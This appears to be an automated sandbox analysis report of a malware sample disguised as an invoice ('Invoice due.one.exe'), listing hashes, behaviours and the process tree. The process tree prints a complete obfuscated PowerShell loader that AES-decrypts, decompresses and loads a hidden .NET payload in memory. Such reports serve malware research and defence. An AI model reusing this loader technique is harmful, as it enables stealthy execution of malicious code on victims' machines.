Analysis
-
max time kernel
1156s -
max time network
1237s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
09-02-2023 14:59
Static task
static1
Behavioral task
behavioral1
Sample
Invoice due.one.exe
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
Invoice due.one.exe
Resource
win7-20221111-en
Behavioral task
behavioral3
Sample
Invoice due.one.exe
Resource
win10v2004-20220901-en
General
-
Target
Invoice due.one.exe
-
Size
153KB
-
MD5
6de66d63e7e9a414313c0237cbe97e78
-
SHA1
464b5449e668281565e3378c72063431be99c15f
-
SHA256
c4faab169180f07a3621c37d42aa79d04825b2a2ecc2ba01b3db7d1a8950c8b6
-
SHA512
cc2ecad9bcee75e79c812564afadee4bfe3445b72818d13ff92b732326e222699b3d803728742a0ddc64adc7405eae3d365abb6371f62a921589ab82075930c0
-
SSDEEP
3072:f0FHdppuOf+wMSHjnywM0vY9t8Qkh+n8KMmkYX3HB8ox1wm/:cFPMOf+wMAywM0EJksnJvNHh8Sn/
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Attached file.bat.exepid process 284 Attached file.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 552 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Attached file.bat.exepid process 284 Attached file.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Attached file.bat.exedescription pid process Token: SeDebugPrivilege 284 Attached file.bat.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
Invoice due.one.execmd.exedescription pid process target process PID 1152 wrote to memory of 552 1152 Invoice due.one.exe cmd.exe PID 1152 wrote to memory of 552 1152 Invoice due.one.exe cmd.exe PID 1152 wrote to memory of 552 1152 Invoice due.one.exe cmd.exe PID 1152 wrote to memory of 552 1152 Invoice due.one.exe cmd.exe PID 552 wrote to memory of 284 552 cmd.exe Attached file.bat.exe PID 552 wrote to memory of 284 552 cmd.exe Attached file.bat.exe PID 552 wrote to memory of 284 552 cmd.exe Attached file.bat.exe PID 552 wrote to memory of 284 552 cmd.exe Attached file.bat.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Invoice due.one.exe"C:\Users\Admin\AppData\Local\Temp\Invoice due.one.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat.exe"Attached file.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $ttXwr = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat').Split([Environment]::NewLine);foreach ($IwcZR in $ttXwr) { if ($IwcZR.StartsWith(':: ')) { $jwYjz = $IwcZR.Substring(3); break; }; };$DRyrf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jwYjz);$jeXlp = New-Object System.Security.Cryptography.AesManaged;$jeXlp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$jeXlp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$jeXlp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CedaivH7c2Og4h7rOIX15KINYZFZWQdVk+kZhiAR7Dg=');$jeXlp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ND6uaRHwvfNQY4EWCZjXCg==');$GxqNz = $jeXlp.CreateDecryptor();$DRyrf = $GxqNz.TransformFinalBlock($DRyrf, 0, $DRyrf.Length);$GxqNz.Dispose();$jeXlp.Dispose();$fIBwg = New-Object System.IO.MemoryStream(, $DRyrf);$MaiTM = New-Object System.IO.MemoryStream;$DTruH = New-Object System.IO.Compression.GZipStream($fIBwg, [IO.Compression.CompressionMode]::Decompress);$DTruH.CopyTo($MaiTM);$DTruH.Dispose();$fIBwg.Dispose();$MaiTM.Dispose();$DRyrf = $MaiTM.ToArray();$WLnCz = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DRyrf);$vfzgA = $WLnCz.EntryPoint;$vfzgA.Invoke($null, (, [string[]] ('')))3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.batFilesize
49KB
MD528083371df55e64f12c86dccc6f69f55
SHA12cc63c7389063aab8fb19609f8a21e038c783eab
SHA2561d2b7d4335fdf27119f1db76fb7685d75dacfc0427c300f83bcbbabeb8622529
SHA512d11fe0d09aada3b069125a075cb9da249c1b30fd4489c912c1563aeff8b846c1e0f2f11cd18c81888d3e731f2331abd4ce2d5d1e4de79246ae3a8004be7a98a3
-
C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
memory/284-58-0x0000000000000000-mapping.dmp
-
memory/284-61-0x00000000748A0000-0x0000000074E4B000-memory.dmpFilesize
5.7MB
-
memory/284-62-0x00000000748A0000-0x0000000074E4B000-memory.dmpFilesize
5.7MB
-
memory/552-55-0x0000000000000000-mapping.dmp
-
memory/1152-54-0x0000000076581000-0x0000000076583000-memory.dmpFilesize
8KB